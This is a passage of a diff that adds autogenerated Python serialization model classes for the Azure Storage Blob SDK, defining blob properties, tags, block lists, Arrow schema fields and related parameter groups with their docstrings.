Optional[int] = None, + **kwargs + ): + """ + :keyword max_size: Optional conditional header. The max length in bytes permitted for the + append blob. If the Append Block operation would cause the blob to exceed that limit or if the + blob size is already greater than the value specified in this header, the request will fail + with MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :paramtype max_size: long + :keyword append_position: Optional conditional header, used only for the Append Block + operation. A number indicating the byte offset to compare. Append Block will succeed only if + the append position is equal to this number. If it is not, the request will fail with the + AppendPositionConditionNotMet error (HTTP status code 412 - Precondition Failed). + :paramtype append_position: long + """ + super(AppendPositionAccessConditions, self).__init__(**kwargs) + self.max_size = max_size + self.append_position = append_position + + +class ArrowConfiguration(msrest.serialization.Model): + """Groups the settings used for formatting the response if the response should be Arrow formatted. + + All required parameters must be populated in order to send to Azure. + + :ivar schema: Required. + :vartype schema: list[~azure.storage.blob.models.ArrowField] + """ + + _validation = { + 'schema': {'required': True}, + } + + _attribute_map = { + 'schema': {'key': 'Schema', 'type': '[ArrowField]', 'xml': {'name': 'Schema', 'wrapped': True, 'itemsName': 'Field'}}, + } + _xml_map = { + 'name': 'ArrowConfiguration' + } + + def __init__( + self, + *, + schema: List["ArrowField"], + **kwargs + ): + """ + :keyword schema: Required. 
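+ The ordered list of fields (see ArrowField below) that make up the Arrow schema.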
+ :paramtype schema: list[~azure.storage.blob.models.ArrowField] + """ + super(ArrowConfiguration, self).__init__(**kwargs) + self.schema = schema + + +class ArrowField(msrest.serialization.Model): + """Groups settings regarding specific field of an arrow schema. + + All required parameters must be populated in order to send to Azure. + + :ivar type: Required. + :vartype type: str + :ivar name: + :vartype name: str + :ivar precision: + :vartype precision: int + :ivar scale: + :vartype scale: int + """ + + _validation = { + 'type': {'required': True}, + } + + _attribute_map = { + 'type': {'key': 'Type', 'type': 'str'}, + 'name': {'key': 'Name', 'type': 'str'}, + 'precision': {'key': 'Precision', 'type': 'int'}, + 'scale': {'key': 'Scale', 'type': 'int'}, + } + _xml_map = { + 'name': 'Field' + } + + def __init__( + self, + *, + type: str, + name: Optional[str] = None, + precision: Optional[int] = None, + scale: Optional[int] = None, + **kwargs + ): + """ + :keyword type: Required. + :paramtype type: str + :keyword name: + :paramtype name: str + :keyword precision: + :paramtype precision: int + :keyword scale: + :paramtype scale: int + """ + super(ArrowField, self).__init__(**kwargs) + self.type = type + self.name = name + self.precision = precision + self.scale = scale + + +class BlobFlatListSegment(msrest.serialization.Model): + """BlobFlatListSegment. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_items: Required. + :vartype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + + _validation = { + 'blob_items': {'required': True}, + } + + _attribute_map = { + 'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]'}, + } + _xml_map = { + 'name': 'Blobs' + } + + def __init__( + self, + *, + blob_items: List["BlobItemInternal"], + **kwargs + ): + """ + :keyword blob_items: Required. + :paramtype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + super(BlobFlatListSegment, self).__init__(**kwargs) + self.blob_items = blob_items + + +class BlobHierarchyListSegment(msrest.serialization.Model): + """BlobHierarchyListSegment. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_prefixes: + :vartype blob_prefixes: list[~azure.storage.blob.models.BlobPrefix] + :ivar blob_items: Required. + :vartype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + + _validation = { + 'blob_items': {'required': True}, + } + + _attribute_map = { + 'blob_prefixes': {'key': 'BlobPrefixes', 'type': '[BlobPrefix]', 'xml': {'name': 'BlobPrefix'}}, + 'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]', 'xml': {'name': 'Blob', 'itemsName': 'Blob'}}, + } + _xml_map = { + 'name': 'Blobs' + } + + def __init__( + self, + *, + blob_items: List["BlobItemInternal"], + blob_prefixes: Optional[List["BlobPrefix"]] = None, + **kwargs + ): + """ + :keyword blob_prefixes: + :paramtype blob_prefixes: list[~azure.storage.blob.models.BlobPrefix] + :keyword blob_items: Required. + :paramtype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + super(BlobHierarchyListSegment, self).__init__(**kwargs) + self.blob_prefixes = blob_prefixes + self.blob_items = blob_items + + +class BlobHTTPHeaders(msrest.serialization.Model): + """Parameter group. + + :ivar blob_cache_control: Optional. Sets the blob's cache control. If specified, this property + is stored with the blob and returned with a read request. + :vartype blob_cache_control: str + :ivar blob_content_type: Optional. 
Sets the blob's content type. If specified, this property is
+ stored with the blob and returned with a read request.
+ :vartype blob_content_type: str
+ :ivar blob_content_md5: Optional. An MD5 hash of the blob content. Note that this hash is not
+ validated, as the hashes for the individual blocks were validated when each was uploaded.
+ :vartype blob_content_md5: bytearray
+ :ivar blob_content_encoding: Optional. Sets the blob's content encoding. If specified, this
+ property is stored with the blob and returned with a read request.
+ :vartype blob_content_encoding: str
+ :ivar blob_content_language: Optional. Sets the blob's content language. If specified, this
+ property is stored with the blob and returned with a read request.
+ :vartype blob_content_language: str
+ :ivar blob_content_disposition: Optional. Sets the blob's Content-Disposition header.
+ :vartype blob_content_disposition: str
+ """
+
+ _attribute_map = {
+ 'blob_cache_control': {'key': 'blobCacheControl', 'type': 'str'},
+ 'blob_content_type': {'key': 'blobContentType', 'type': 'str'},
+ 'blob_content_md5': {'key': 'blobContentMD5', 'type': 'bytearray'},
+ 'blob_content_encoding': {'key': 'blobContentEncoding', 'type': 'str'},
+ 'blob_content_language': {'key': 'blobContentLanguage', 'type': 'str'},
+ 'blob_content_disposition': {'key': 'blobContentDisposition', 'type': 'str'},
+ }
+
+ def __init__(
+ self,
+ *,
+ blob_cache_control: Optional[str] = None,
+ blob_content_type: Optional[str] = None,
+ blob_content_md5: Optional[bytearray] = None,
+ blob_content_encoding: Optional[str] = None,
+ blob_content_language: Optional[str] = None,
+ blob_content_disposition: Optional[str] = None,
+ **kwargs
+ ):
+ """
+ :keyword blob_cache_control: Optional. Sets the blob's cache control. If specified, this
+ property is stored with the blob and returned with a read request.
+ :paramtype blob_cache_control: str
+ :keyword blob_content_type: Optional. Sets the blob's content type. If specified, this property
+ is stored with the blob and returned with a read request.
+ :paramtype blob_content_type: str
+ :keyword blob_content_md5: Optional. An MD5 hash of the blob content. Note that this hash is
+ not validated, as the hashes for the individual blocks were validated when each was uploaded.
+ :paramtype blob_content_md5: bytearray
+ :keyword blob_content_encoding: Optional. Sets the blob's content encoding. If specified, this
+ property is stored with the blob and returned with a read request.
+ :paramtype blob_content_encoding: str
+ :keyword blob_content_language: Optional. Sets the blob's content language. If specified, this
+ property is stored with the blob and returned with a read request.
+ :paramtype blob_content_language: str
+ :keyword blob_content_disposition: Optional. Sets the blob's Content-Disposition header.
+ :paramtype blob_content_disposition: str
+ """
+ super(BlobHTTPHeaders, self).__init__(**kwargs)
+ self.blob_cache_control = blob_cache_control
+ self.blob_content_type = blob_content_type
+ self.blob_content_md5 = blob_content_md5
+ self.blob_content_encoding = blob_content_encoding
+ self.blob_content_language = blob_content_language
+ self.blob_content_disposition = blob_content_disposition
+
+
+class BlobItemInternal(msrest.serialization.Model):
+ """An Azure Storage blob.
+
+ All required parameters must be populated in order to send to Azure.
+
+ :ivar name: Required.
+ :vartype name: ~azure.storage.blob.models.BlobName
+ :ivar deleted: Required.
+ :vartype deleted: bool
+ :ivar snapshot: Required.
+ :vartype snapshot: str
+ :ivar version_id:
+ :vartype version_id: str
+ :ivar is_current_version:
+ :vartype is_current_version: bool
+ :ivar properties: Required. Properties of a blob.
+ :vartype properties: ~azure.storage.blob.models.BlobPropertiesInternal
+ :ivar metadata:
+ :vartype metadata: ~azure.storage.blob.models.BlobMetadata
+ :ivar blob_tags: Blob tags.
+ :vartype blob_tags: ~azure.storage.blob.models.BlobTags
+ :ivar has_versions_only:
+ :vartype has_versions_only: bool
+ :ivar object_replication_metadata: Dictionary of string keys and values.
+ :vartype object_replication_metadata: dict[str, str]
+ """
+
+ _validation = {
+ 'name': {'required': True},
+ 'deleted': {'required': True},
+ 'snapshot': {'required': True},
+ 'properties': {'required': True},
+ }
+
+ _attribute_map = {
+ 'name': {'key': 'Name', 'type': 'BlobName'},
+ 'deleted': {'key': 'Deleted', 'type': 'bool'},
+ 'snapshot': {'key': 'Snapshot', 'type': 'str'},
+ 'version_id': {'key': 'VersionId', 'type': 'str'},
+ 'is_current_version': {'key': 'IsCurrentVersion', 'type': 'bool'},
+ 'properties': {'key': 'Properties', 'type': 'BlobPropertiesInternal'},
+ 'metadata': {'key': 'Metadata', 'type': 'BlobMetadata'},
+ 'blob_tags': {'key': 'BlobTags', 'type': 'BlobTags'},
+ 'has_versions_only': {'key': 'HasVersionsOnly', 'type': 'bool'},
+ 'object_replication_metadata': {'key': 'OrMetadata', 'type': '{str}'},
+ }
+ _xml_map = {
+ 'name': 'Blob'
+ }
+
+ def __init__(
+ self,
+ *,
+ name: "BlobName",
+ deleted: bool,
+ snapshot: str,
+ properties: "BlobPropertiesInternal",
+ version_id: Optional[str] = None,
+ is_current_version: Optional[bool] = None,
+ metadata: Optional["BlobMetadata"] = None,
+ blob_tags: Optional["BlobTags"] = None,
+ has_versions_only: Optional[bool] = None,
+ object_replication_metadata: Optional[Dict[str, str]] = None,
+ **kwargs
+ ):
+ """
+ :keyword name: Required.
+ :paramtype name: ~azure.storage.blob.models.BlobName
+ :keyword deleted: Required.
+ :paramtype deleted: bool
+ :keyword snapshot: Required.
+ :paramtype snapshot: str
+ :keyword version_id:
+ :paramtype version_id: str
+ :keyword is_current_version:
+ :paramtype is_current_version: bool
+ :keyword properties: Required. Properties of a blob.
+ :paramtype properties: ~azure.storage.blob.models.BlobPropertiesInternal
+ :keyword metadata:
+ :paramtype metadata: ~azure.storage.blob.models.BlobMetadata
+ :keyword blob_tags: Blob tags.
+ :paramtype blob_tags: ~azure.storage.blob.models.BlobTags
+ :keyword has_versions_only:
+ :paramtype has_versions_only: bool
+ :keyword object_replication_metadata: Dictionary of string keys and values.
+ :paramtype object_replication_metadata: dict[str, str]
+ """
+ super(BlobItemInternal, self).__init__(**kwargs)
+ self.name = name
+ self.deleted = deleted
+ self.snapshot = snapshot
+ self.version_id = version_id
+ self.is_current_version = is_current_version
+ self.properties = properties
+ self.metadata = metadata
+ self.blob_tags = blob_tags
+ self.has_versions_only = has_versions_only
+ self.object_replication_metadata = object_replication_metadata
+
+
+class BlobMetadata(msrest.serialization.Model):
+ """BlobMetadata.
+
+ :ivar additional_properties: Unmatched properties from the message are deserialized to this
+ collection.
+ :vartype additional_properties: dict[str, str] + :ivar encrypted: + :vartype encrypted: str + """ + + _attribute_map = { + 'additional_properties': {'key': '', 'type': '{str}'}, + 'encrypted': {'key': 'Encrypted', 'type': 'str', 'xml': {'attr': True}}, + } + _xml_map = { + 'name': 'Metadata' + } + + def __init__( + self, + *, + additional_properties: Optional[Dict[str, str]] = None, + encrypted: Optional[str] = None, + **kwargs + ): + """ + :keyword additional_properties: Unmatched properties from the message are deserialized to this + collection. + :paramtype additional_properties: dict[str, str] + :keyword encrypted: + :paramtype encrypted: str + """ + super(BlobMetadata, self).__init__(**kwargs) + self.additional_properties = additional_properties + self.encrypted = encrypted + + +class BlobName(msrest.serialization.Model): + """BlobName. + + :ivar encoded: Indicates if the blob name is encoded. + :vartype encoded: bool + :ivar content: The name of the blob. + :vartype content: str + """ + + _attribute_map = { + 'encoded': {'key': 'Encoded', 'type': 'bool', 'xml': {'name': 'Encoded', 'attr': True}}, + 'content': {'key': 'content', 'type': 'str', 'xml': {'text': True}}, + } + + def __init__( + self, + *, + encoded: Optional[bool] = None, + content: Optional[str] = None, + **kwargs + ): + """ + :keyword encoded: Indicates if the blob name is encoded. + :paramtype encoded: bool + :keyword content: The name of the blob. + :paramtype content: str + """ + super(BlobName, self).__init__(**kwargs) + self.encoded = encoded + self.content = content + + +class BlobPrefix(msrest.serialization.Model): + """BlobPrefix. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: ~azure.storage.blob.models.BlobName + """ + + _validation = { + 'name': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'BlobName'}, + } + + def __init__( + self, + *, + name: "BlobName", + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: ~azure.storage.blob.models.BlobName + """ + super(BlobPrefix, self).__init__(**kwargs) + self.name = name + + +class BlobPropertiesInternal(msrest.serialization.Model): + """Properties of a blob. + + All required parameters must be populated in order to send to Azure. + + :ivar creation_time: + :vartype creation_time: ~datetime.datetime + :ivar last_modified: Required. + :vartype last_modified: ~datetime.datetime + :ivar etag: Required. + :vartype etag: str + :ivar content_length: Size in bytes. + :vartype content_length: long + :ivar content_type: + :vartype content_type: str + :ivar content_encoding: + :vartype content_encoding: str + :ivar content_language: + :vartype content_language: str + :ivar content_md5: + :vartype content_md5: bytearray + :ivar content_disposition: + :vartype content_disposition: str + :ivar cache_control: + :vartype cache_control: str + :ivar blob_sequence_number: + :vartype blob_sequence_number: long + :ivar blob_type: Possible values include: "BlockBlob", "PageBlob", "AppendBlob". + :vartype blob_type: str or ~azure.storage.blob.models.BlobType + :ivar lease_status: Possible values include: "locked", "unlocked". + :vartype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :ivar lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :vartype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :ivar lease_duration: Possible values include: "infinite", "fixed". 
+ :vartype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :ivar copy_id: + :vartype copy_id: str + :ivar copy_status: Possible values include: "pending", "success", "aborted", "failed". + :vartype copy_status: str or ~azure.storage.blob.models.CopyStatusType + :ivar copy_source: + :vartype copy_source: str + :ivar copy_progress: + :vartype copy_progress: str + :ivar copy_completion_time: + :vartype copy_completion_time: ~datetime.datetime + :ivar copy_status_description: + :vartype copy_status_description: str + :ivar server_encrypted: + :vartype server_encrypted: bool + :ivar incremental_copy: + :vartype incremental_copy: bool + :ivar destination_snapshot: + :vartype destination_snapshot: str + :ivar deleted_time: + :vartype deleted_time: ~datetime.datetime + :ivar remaining_retention_days: + :vartype remaining_retention_days: int + :ivar access_tier: Possible values include: "P4", "P6", "P10", "P15", "P20", "P30", "P40", + "P50", "P60", "P70", "P80", "Hot", "Cool", "Archive". + :vartype access_tier: str or ~azure.storage.blob.models.AccessTier + :ivar access_tier_inferred: + :vartype access_tier_inferred: bool + :ivar archive_status: Possible values include: "rehydrate-pending-to-hot", + "rehydrate-pending-to-cool". + :vartype archive_status: str or ~azure.storage.blob.models.ArchiveStatus + :ivar customer_provided_key_sha256: + :vartype customer_provided_key_sha256: str + :ivar encryption_scope: The name of the encryption scope under which the blob is encrypted. + :vartype encryption_scope: str + :ivar access_tier_change_time: + :vartype access_tier_change_time: ~datetime.datetime + :ivar tag_count: + :vartype tag_count: int + :ivar expires_on: + :vartype expires_on: ~datetime.datetime + :ivar is_sealed: + :vartype is_sealed: bool + :ivar rehydrate_priority: If an object is in rehydrate pending state then this header is + returned with priority of rehydrate. Valid values are High and Standard. Possible values + include: "High", "Standard". + :vartype rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :ivar last_accessed_on: + :vartype last_accessed_on: ~datetime.datetime + :ivar immutability_policy_expires_on: + :vartype immutability_policy_expires_on: ~datetime.datetime + :ivar immutability_policy_mode: Possible values include: "Mutable", "Unlocked", "Locked". 
+ :vartype immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :ivar legal_hold: + :vartype legal_hold: bool + """ + + _validation = { + 'last_modified': {'required': True}, + 'etag': {'required': True}, + } + + _attribute_map = { + 'creation_time': {'key': 'Creation-Time', 'type': 'rfc-1123'}, + 'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123'}, + 'etag': {'key': 'Etag', 'type': 'str'}, + 'content_length': {'key': 'Content-Length', 'type': 'long'}, + 'content_type': {'key': 'Content-Type', 'type': 'str'}, + 'content_encoding': {'key': 'Content-Encoding', 'type': 'str'}, + 'content_language': {'key': 'Content-Language', 'type': 'str'}, + 'content_md5': {'key': 'Content-MD5', 'type': 'bytearray'}, + 'content_disposition': {'key': 'Content-Disposition', 'type': 'str'}, + 'cache_control': {'key': 'Cache-Control', 'type': 'str'}, + 'blob_sequence_number': {'key': 'x-ms-blob-sequence-number', 'type': 'long'}, + 'blob_type': {'key': 'BlobType', 'type': 'str'}, + 'lease_status': {'key': 'LeaseStatus', 'type': 'str'}, + 'lease_state': {'key': 'LeaseState', 'type': 'str'}, + 'lease_duration': {'key': 'LeaseDuration', 'type': 'str'}, + 'copy_id': {'key': 'CopyId', 'type': 'str'}, + 'copy_status': {'key': 'CopyStatus', 'type': 'str'}, + 'copy_source': {'key': 'CopySource', 'type': 'str'}, + 'copy_progress': {'key': 'CopyProgress', 'type': 'str'}, + 'copy_completion_time': {'key': 'CopyCompletionTime', 'type': 'rfc-1123'}, + 'copy_status_description': {'key': 'CopyStatusDescription', 'type': 'str'}, + 'server_encrypted': {'key': 'ServerEncrypted', 'type': 'bool'}, + 'incremental_copy': {'key': 'IncrementalCopy', 'type': 'bool'}, + 'destination_snapshot': {'key': 'DestinationSnapshot', 'type': 'str'}, + 'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123'}, + 'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int'}, + 'access_tier': {'key': 'AccessTier', 'type': 'str'}, + 'access_tier_inferred': {'key': 'AccessTierInferred', 'type': 'bool'}, + 'archive_status': {'key': 'ArchiveStatus', 'type': 'str'}, + 'customer_provided_key_sha256': {'key': 'CustomerProvidedKeySha256', 'type': 'str'}, + 'encryption_scope': {'key': 'EncryptionScope', 'type': 'str'}, + 'access_tier_change_time': {'key': 'AccessTierChangeTime', 'type': 'rfc-1123'}, + 'tag_count': {'key': 'TagCount', 'type': 'int'}, + 'expires_on': {'key': 'Expiry-Time', 'type': 'rfc-1123'}, + 'is_sealed': {'key': 'Sealed', 'type': 'bool'}, + 'rehydrate_priority': {'key': 'RehydratePriority', 'type': 'str'}, + 'last_accessed_on': {'key': 'LastAccessTime', 'type': 'rfc-1123'}, + 'immutability_policy_expires_on': {'key': 'ImmutabilityPolicyUntilDate', 'type': 'rfc-1123'}, + 'immutability_policy_mode': {'key': 'ImmutabilityPolicyMode', 'type': 'str'}, + 'legal_hold': {'key': 'LegalHold', 'type': 'bool'}, + } + _xml_map = { + 'name': 'Properties' + } + + def __init__( + self, + *, + last_modified: datetime.datetime, + etag: str, + creation_time: Optional[datetime.datetime] = None, + content_length: Optional[int] = None, + content_type: Optional[str] = None, + content_encoding: Optional[str] = None, + content_language: Optional[str] = None, + content_md5: Optional[bytearray] = None, + content_disposition: Optional[str] = None, + cache_control: Optional[str] = None, + blob_sequence_number: Optional[int] = None, + blob_type: Optional[Union[str, "BlobType"]] = None, + lease_status: Optional[Union[str, "LeaseStatusType"]] = None, + lease_state: Optional[Union[str, "LeaseStateType"]] = None, 
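+ # The optional parameters below mirror the child elements of the <Properties> XML
+ # node, as declared in _attribute_map and _xml_map above.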
+ lease_duration: Optional[Union[str, "LeaseDurationType"]] = None, + copy_id: Optional[str] = None, + copy_status: Optional[Union[str, "CopyStatusType"]] = None, + copy_source: Optional[str] = None, + copy_progress: Optional[str] = None, + copy_completion_time: Optional[datetime.datetime] = None, + copy_status_description: Optional[str] = None, + server_encrypted: Optional[bool] = None, + incremental_copy: Optional[bool] = None, + destination_snapshot: Optional[str] = None, + deleted_time: Optional[datetime.datetime] = None, + remaining_retention_days: Optional[int] = None, + access_tier: Optional[Union[str, "AccessTier"]] = None, + access_tier_inferred: Optional[bool] = None, + archive_status: Optional[Union[str, "ArchiveStatus"]] = None, + customer_provided_key_sha256: Optional[str] = None, + encryption_scope: Optional[str] = None, + access_tier_change_time: Optional[datetime.datetime] = None, + tag_count: Optional[int] = None, + expires_on: Optional[datetime.datetime] = None, + is_sealed: Optional[bool] = None, + rehydrate_priority: Optional[Union[str, "RehydratePriority"]] = None, + last_accessed_on: Optional[datetime.datetime] = None, + immutability_policy_expires_on: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + **kwargs + ): + """ + :keyword creation_time: + :paramtype creation_time: ~datetime.datetime + :keyword last_modified: Required. + :paramtype last_modified: ~datetime.datetime + :keyword etag: Required. + :paramtype etag: str + :keyword content_length: Size in bytes. + :paramtype content_length: long + :keyword content_type: + :paramtype content_type: str + :keyword content_encoding: + :paramtype content_encoding: str + :keyword content_language: + :paramtype content_language: str + :keyword content_md5: + :paramtype content_md5: bytearray + :keyword content_disposition: + :paramtype content_disposition: str + :keyword cache_control: + :paramtype cache_control: str + :keyword blob_sequence_number: + :paramtype blob_sequence_number: long + :keyword blob_type: Possible values include: "BlockBlob", "PageBlob", "AppendBlob". + :paramtype blob_type: str or ~azure.storage.blob.models.BlobType + :keyword lease_status: Possible values include: "locked", "unlocked". + :paramtype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :keyword lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :paramtype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :keyword lease_duration: Possible values include: "infinite", "fixed". + :paramtype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :keyword copy_id: + :paramtype copy_id: str + :keyword copy_status: Possible values include: "pending", "success", "aborted", "failed". 
+ :paramtype copy_status: str or ~azure.storage.blob.models.CopyStatusType + :keyword copy_source: + :paramtype copy_source: str + :keyword copy_progress: + :paramtype copy_progress: str + :keyword copy_completion_time: + :paramtype copy_completion_time: ~datetime.datetime + :keyword copy_status_description: + :paramtype copy_status_description: str + :keyword server_encrypted: + :paramtype server_encrypted: bool + :keyword incremental_copy: + :paramtype incremental_copy: bool + :keyword destination_snapshot: + :paramtype destination_snapshot: str + :keyword deleted_time: + :paramtype deleted_time: ~datetime.datetime + :keyword remaining_retention_days: + :paramtype remaining_retention_days: int + :keyword access_tier: Possible values include: "P4", "P6", "P10", "P15", "P20", "P30", "P40", + "P50", "P60", "P70", "P80", "Hot", "Cool", "Archive". + :paramtype access_tier: str or ~azure.storage.blob.models.AccessTier + :keyword access_tier_inferred: + :paramtype access_tier_inferred: bool + :keyword archive_status: Possible values include: "rehydrate-pending-to-hot", + "rehydrate-pending-to-cool". + :paramtype archive_status: str or ~azure.storage.blob.models.ArchiveStatus + :keyword customer_provided_key_sha256: + :paramtype customer_provided_key_sha256: str + :keyword encryption_scope: The name of the encryption scope under which the blob is encrypted. + :paramtype encryption_scope: str + :keyword access_tier_change_time: + :paramtype access_tier_change_time: ~datetime.datetime + :keyword tag_count: + :paramtype tag_count: int + :keyword expires_on: + :paramtype expires_on: ~datetime.datetime + :keyword is_sealed: + :paramtype is_sealed: bool + :keyword rehydrate_priority: If an object is in rehydrate pending state then this header is + returned with priority of rehydrate. Valid values are High and Standard. Possible values + include: "High", "Standard". + :paramtype rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :keyword last_accessed_on: + :paramtype last_accessed_on: ~datetime.datetime + :keyword immutability_policy_expires_on: + :paramtype immutability_policy_expires_on: ~datetime.datetime + :keyword immutability_policy_mode: Possible values include: "Mutable", "Unlocked", "Locked". 
+ :paramtype immutability_policy_mode: str or + ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :keyword legal_hold: + :paramtype legal_hold: bool + """ + super(BlobPropertiesInternal, self).__init__(**kwargs) + self.creation_time = creation_time + self.last_modified = last_modified + self.etag = etag + self.content_length = content_length + self.content_type = content_type + self.content_encoding = content_encoding + self.content_language = content_language + self.content_md5 = content_md5 + self.content_disposition = content_disposition + self.cache_control = cache_control + self.blob_sequence_number = blob_sequence_number + self.blob_type = blob_type + self.lease_status = lease_status + self.lease_state = lease_state + self.lease_duration = lease_duration + self.copy_id = copy_id + self.copy_status = copy_status + self.copy_source = copy_source + self.copy_progress = copy_progress + self.copy_completion_time = copy_completion_time + self.copy_status_description = copy_status_description + self.server_encrypted = server_encrypted + self.incremental_copy = incremental_copy + self.destination_snapshot = destination_snapshot + self.deleted_time = deleted_time + self.remaining_retention_days = remaining_retention_days + self.access_tier = access_tier + self.access_tier_inferred = access_tier_inferred + self.archive_status = archive_status + self.customer_provided_key_sha256 = customer_provided_key_sha256 + self.encryption_scope = encryption_scope + self.access_tier_change_time = access_tier_change_time + self.tag_count = tag_count + self.expires_on = expires_on + self.is_sealed = is_sealed + self.rehydrate_priority = rehydrate_priority + self.last_accessed_on = last_accessed_on + self.immutability_policy_expires_on = immutability_policy_expires_on + self.immutability_policy_mode = immutability_policy_mode + self.legal_hold = legal_hold + + +class BlobTag(msrest.serialization.Model): + """BlobTag. + + All required parameters must be populated in order to send to Azure. + + :ivar key: Required. + :vartype key: str + :ivar value: Required. + :vartype value: str + """ + + _validation = { + 'key': {'required': True}, + 'value': {'required': True}, + } + + _attribute_map = { + 'key': {'key': 'Key', 'type': 'str'}, + 'value': {'key': 'Value', 'type': 'str'}, + } + _xml_map = { + 'name': 'Tag' + } + + def __init__( + self, + *, + key: str, + value: str, + **kwargs + ): + """ + :keyword key: Required. + :paramtype key: str + :keyword value: Required. + :paramtype value: str + """ + super(BlobTag, self).__init__(**kwargs) + self.key = key + self.value = value + + +class BlobTags(msrest.serialization.Model): + """Blob tags. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_tag_set: Required. + :vartype blob_tag_set: list[~azure.storage.blob.models.BlobTag] + """ + + _validation = { + 'blob_tag_set': {'required': True}, + } + + _attribute_map = { + 'blob_tag_set': {'key': 'BlobTagSet', 'type': '[BlobTag]', 'xml': {'name': 'TagSet', 'wrapped': True, 'itemsName': 'Tag'}}, + } + _xml_map = { + 'name': 'Tags' + } + + def __init__( + self, + *, + blob_tag_set: List["BlobTag"], + **kwargs + ): + """ + :keyword blob_tag_set: Required. + :paramtype blob_tag_set: list[~azure.storage.blob.models.BlobTag] + """ + super(BlobTags, self).__init__(**kwargs) + self.blob_tag_set = blob_tag_set + + +class Block(msrest.serialization.Model): + """Represents a single block in a block blob. It describes the block's ID and size. 
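+
+ A hypothetical construction for illustration (instances are normally produced by
+ the response deserializer rather than built by hand)::
+
+     block = Block(name="YmxvY2stMDA=", size=4096)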
+ + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. The base64 encoded block ID. + :vartype name: str + :ivar size: Required. The block size in bytes. + :vartype size: long + """ + + _validation = { + 'name': {'required': True}, + 'size': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'size': {'key': 'Size', 'type': 'long'}, + } + + def __init__( + self, + *, + name: str, + size: int, + **kwargs + ): + """ + :keyword name: Required. The base64 encoded block ID. + :paramtype name: str + :keyword size: Required. The block size in bytes. + :paramtype size: long + """ + super(Block, self).__init__(**kwargs) + self.name = name + self.size = size + + +class BlockList(msrest.serialization.Model): + """BlockList. + + :ivar committed_blocks: + :vartype committed_blocks: list[~azure.storage.blob.models.Block] + :ivar uncommitted_blocks: + :vartype uncommitted_blocks: list[~azure.storage.blob.models.Block] + """ + + _attribute_map = { + 'committed_blocks': {'key': 'CommittedBlocks', 'type': '[Block]', 'xml': {'wrapped': True}}, + 'uncommitted_blocks': {'key': 'UncommittedBlocks', 'type': '[Block]', 'xml': {'wrapped': True}}, + } + + def __init__( + self, + *, + committed_blocks: Optional[List["Block"]] = None, + uncommitted_blocks: Optional[List["Block"]] = None, + **kwargs + ): + """ + :keyword committed_blocks: + :paramtype committed_blocks: list[~azure.storage.blob.models.Block] + :keyword uncommitted_blocks: + :paramtype uncommitted_blocks: list[~azure.storage.blob.models.Block] + """ + super(BlockList, self).__init__(**kwargs) + self.committed_blocks = committed_blocks + self.uncommitted_blocks = uncommitted_blocks + + +class BlockLookupList(msrest.serialization.Model): + """BlockLookupList. + + :ivar committed: + :vartype committed: list[str] + :ivar uncommitted: + :vartype uncommitted: list[str] + :ivar latest: + :vartype latest: list[str] + """ + + _attribute_map = { + 'committed': {'key': 'Committed', 'type': '[str]', 'xml': {'itemsName': 'Committed'}}, + 'uncommitted': {'key': 'Uncommitted', 'type': '[str]', 'xml': {'itemsName': 'Uncommitted'}}, + 'latest': {'key': 'Latest', 'type': '[str]', 'xml': {'itemsName': 'Latest'}}, + } + _xml_map = { + 'name': 'BlockList' + } + + def __init__( + self, + *, + committed: Optional[List[str]] = None, + uncommitted: Optional[List[str]] = None, + latest: Optional[List[str]] = None, + **kwargs + ): + """ + :keyword committed: + :paramtype committed: list[str] + :keyword uncommitted: + :paramtype uncommitted: list[str] + :keyword latest: + :paramtype latest: list[str] + """ + super(BlockLookupList, self).__init__(**kwargs) + self.committed = committed + self.uncommitted = uncommitted + self.latest = latest + + +class ClearRange(msrest.serialization.Model): + """ClearRange. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. + :vartype start: long + :ivar end: Required. + :vartype end: long + """ + + _validation = { + 'start': {'required': True}, + 'end': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}}, + 'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}}, + } + _xml_map = { + 'name': 'ClearRange' + } + + def __init__( + self, + *, + start: int, + end: int, + **kwargs + ): + """ + :keyword start: Required. + :paramtype start: long + :keyword end: Required. 
+ :paramtype end: long
+ """
+ super(ClearRange, self).__init__(**kwargs)
+ self.start = start
+ self.end = end
+
+
+class ContainerCpkScopeInfo(msrest.serialization.Model):
+ """Parameter group.
+
+ :ivar default_encryption_scope: Optional. Version 2019-07-07 and later. Specifies the default
+ encryption scope to set on the container and use for all future writes.
+ :vartype default_encryption_scope: str
+ :ivar prevent_encryption_scope_override: Optional. Version 2019-07-07 and later. If true,
+ prevents any request from specifying a different encryption scope than the scope set on the
+ container.
